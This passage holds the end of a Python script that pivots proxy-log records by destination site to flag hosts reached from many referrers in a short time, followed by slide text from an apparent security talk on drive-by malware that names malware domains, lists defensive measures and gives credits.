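    """Path part of an absolute URL ('http://h/BVRQ' -> '/BVRQ')."""
    return re.sub(r"^https?://[^/]+", "", url)


def pivot_by_site(records):
    """Group hits by destination Site: who referred users there, from which server IPs,
    to which paths, and over what time span (seconds between first and last hit)."""
    groups = defaultdict(list)
    for r in records:
        groups[r["site"]].append(r)
    pivot = {}
    for site, hits in groups.items():
        times = sorted(h["ts"] for h in hits)
        pivot[site] = {
            "referrer_hosts": sorted({host_of(h["ref"]) for h in hits}),
            "ips": sorted({h["ip"] for h in hits}),
            "paths": sorted({path_of(h["url"]) for h in hits}),
            "span_seconds": int((times[-1] - times[0]).total_seconds()),
            "hits": len(hits),
        }
    return pivot


def suspicious_sites(pivot, min_referrers=2, max_span_seconds=3600):
    """Destinations reached from several distinct referrers inside one short window:
    the shape of the slides' examples, where three news sites fed one host in 14 minutes."""
    return sorted(site for site, p in pivot.items()
                  if len(p["referrer_hosts"]) >= min_referrers
                  and p["span_seconds"] <= max_span_seconds)


if __name__ == "__main__":
    pivot = pivot_by_site(parse_records(LOG_RECORDS))
    for site in suspicious_sites(pivot):
        print(site, pivot[site])
```

On real proxy logs the same grouping is best run per hour with a whitelist of CDNs and ad networks, which legitimately collect referrers from many sites; what remains are hosts with few paths, one IP and no business relationship to the pages that referred to them.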
  • 52. Another news, another phone… • Legal • Faked
  • 55. Malware examples 01ie.ru, 02ie.ru, 03ie.ru (Registered by reg.ru)
  • 56. Malware examples 01ie.ru, 02ie.ru, 03ie.ru (Registered by reg.ru)
  • 65. What can we do? • Patch endpoint • Tighten the Internet filtering (default deny if possible) • No Internet surfing with admin rights • See what’s happening (continuous monitoring) • Check if you’re well (regular technical audits) • Educate people
  • 66. Credits • Sergey V. Soldatov, TBINFORM (TNK-BP Group) • Konstantin Y. Kadushkin, TBINFORM (TNK-BP Group) • Wayne Huang, ARMORIZE
  • 67. THE END Vladimir B. Kropotov Information security analyst TBINFORM (TNK-BP Group) vbkropotov@tnk-bp.com kropotov@ieee.org